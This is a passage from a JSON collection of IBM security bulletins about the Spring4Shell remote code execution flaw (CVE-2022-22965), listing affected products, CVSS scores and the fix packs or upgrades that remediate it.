Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo for Civil Infrastructure| 7.6.2.1, 7.6.3, 7.6.3.1 \n \n\n\n## Remediation/Fixes\n\nDownload the correct version of the fix from the following link: [IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack](<https://www.ibm.com/support/pages/node/6569525> \"IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack\" ). Installation instructions for the fix are included in the readme document that is in the fix package.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:15:01", "type": "ibm", "title": "Security Bulletin: IBM Maximo For Civil infrastructure is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T15:15:01", "id": "22F3632F9800C8C7D12EDA0C85AC627F2AABCAA068D310065EEF12F9F4A345C4", "href": "https://www.ibm.com/support/pages/node/6570913", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:23:03", "description": "## Summary\n\nIBM Cloud Pak for Business Automation is affected but not classified as vulnerable to a remote code execution in Spring Framework as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Parts of the Spring framework is used in multiple components of Cloud Pak for Business Automation to perform transaction management, database access or processing of web request. The fix includes Spring V5.3.20 and later and removes Spring from some product components. [CVE-2022-22965]\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. 
\nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) | Status \n---|---|--- \nIBM Cloud Pak for Business Automation | V22.0.1 - V22.0.1-IF001 | affected \nIBM Cloud Pak for Business Automation | V21.0.3 - V21.0.3-IF011 | affected \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | affected \n \n## Remediation/Fixes\n\nApply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) in order to upgrade the version of Spring framework libraries. 
Affected Product(s) | Version(s) | Remediation / Fix \n---|---|--- \nIBM Cloud Pak for Business Automation | 22.0.1 - 22.0.1-IF001 | Apply [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \nIBM Cloud Pak for Business Automation | 21.0.3 - 21.0.3-IF011 | Apply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | Upgrade to \n[21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later or \n[22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T04:45:54", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Business Automation is affected but not classified as vulnerable by a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-06T04:45:54", "id": "0873F460B0C56BEFFB7C20248A3B9104F79891FA48CE8B004739684341A51D1D", "href": "https://www.ibm.com/support/pages/node/6826635", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:21:26", "description": "## Summary\n\nCloud Pak for Security (CP4S) 1.9.1.0 and earlier is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in CP4S as a base framework for Java components. It is consumed through Spring Boot Parent. The fix includes Spring Boot Parent 2.6.6. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.9.1.0 \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\nPlease upgrade to at least CP4S 1.10.0.0 following these instructions: <https://www.ibm.com/docs/en/cloud-paks/cp-security/1.10?topic=installing-upgrading-cloud-pak-security>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T18:28:41", "type": "ibm", "title": "Security Bulletin: Cloud Pak for Security is affected by but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-01T18:28:41", "id": "4AF3DEB82989B4E6746A3E3F13D975DBE8BF4FDB968286C60FFA2743AA829CC4", "href": 
"https://www.ibm.com/support/pages/node/6833578", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:11:39", "description": "## Summary\n\nThere is a vulnerability in Spring Framework that could allow a local attacker to execute arbitrary code on the system. The code is used by IBM Process Mining. This bulletin identifies the security fixes to apply to address the vulnerability. The product is in an affected but not vulnerable state\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Process Mining| 1.12.0.4 \n \n## Remediation/Fixes\n\n**Remediation/Fixes guidance**:\n\n**Product(s)**| **Version(s) number and/or range **| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Process Mining| 1.12.0.4| \n\n**Upgrade to version 1.12.0.5** \n \n1.Login to [PassPortAdvantage](<https://www-112.ibm.com/software/howtobuy/passportadvantage/homepage/paocustomer> \"\" ) \n \n2\\. Search for \n**M0682ML** Process Mining 1.12.0.5 Server Multiplatform Multilingual \n \n3\\. 
Download package\n\n4\\. Follow install instructions \n \n5\\. Repeat for **M0681ML** Process Mining 1.12.0.5 Client Windows Multilingual \n \n| | \n \n## Workarounds and Mitigations\n\nNone Known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T21:43:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework affects IBM Process Mining and could allow a local attacker to execute arbitrary code on the system (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-01T21:43:23", "id": "EDAF5143E634E5EF55D5C0186ECF166CE8CE37DFE44681979D15F0D7CA2DAFAD", "href": "https://www.ibm.com/support/pages/node/6606977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:16:29", "description": "## Summary\n\nIBM Tivoli Monitoring is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. 
Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The Tivoli Enterprise Portal Server (CQ) component includes but does not use it. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 - 6.3.0.7 (up to 6.3.0.7 Service pack 10) \n \n\n\n## Remediation/Fixes\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0012| 6.3.0.7 Fix Pack 7 Service Pack 12| <https://www.ibm.com/support/pages/ibm-tivoli-monitoring-630-fix-pack-7-service-pack-12-6307-tiv-itm-sp0012> \nThe fix requires the system is at 630 Fix pack 7 or later as a prerequisite. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-12-30T17:31:59", "id": "DA39104C275021EF88649293DFAF282637E8219443A30527A58A6E25E7ABA491", "href": "https://www.ibm.com/support/pages/node/6587154", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:29:00", "description": "## Summary\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. 
Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. 
Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:30:44", "type": "ibm", "title": "Security Bulletin: IBM Sterling File Gateway is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:30:44", "id": "07FEC8A129A779FAB145D3092FB4D733884D03DF23AA13470BF539F0AAE36C84", "href": "https://www.ibm.com/support/pages/node/6574421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:29", "description": "## Summary\n\nIBM Edge Application Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. 
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used to handle the REST calls and protocol when the Tomcat HTTP server is created. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Edge Application Manager| 4.3 \n \n\n\n## Remediation/Fixes\n\nThis bulletin provides a remediation for vulnerability [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>). Please act swiftly by upgrading IBM Edge Application Manager to the latest version <https://www.ibm.com/docs/en/eam/4.3?topic=hub-passport-advantage>. 
This includes updates to Spring Framework which addresses any potential exposure to the Spring4Shell vulnerabilities.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T04:27:23", "type": "ibm", "title": "Security Bulletin: IBM Edge Application Manager is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965))", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-02T04:27:23", "id": "E4D093275B3398CF07F3141B553D072C5304E4F560EE4AEFD306FE5B5472E00B", "href": "https://www.ibm.com/support/pages/node/6591361", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:14:55", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. 
Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in Watson Speech Services with embedded Tomcat to build our STT and TTS Java web services. The current fix includes Spring v5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data | 4.0.0 - 4.0.6 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data **| ** 4.0.7 **| **The fix in 4.0.7 applies to all versions listed (4.0.0-4.0.6). 
Version 4.0.7 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=installing-cloud-pak-data> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-12T21:59:00", "id": "EB58ABDFAA1D2A9C4F164D6FC9FD899843DF1F1028ECDA035A0F0C34CD298FAD", "href": "https://www.ibm.com/support/pages/node/6583151", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:49", "description": "## Summary\n\nIBM Spectrum Symphony is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. 
Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Symphony includes Spring Framework related classes in the package. It impacts the WEBGUI, REST and HostFactory components. The fix upgrades Spring Framework to 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ 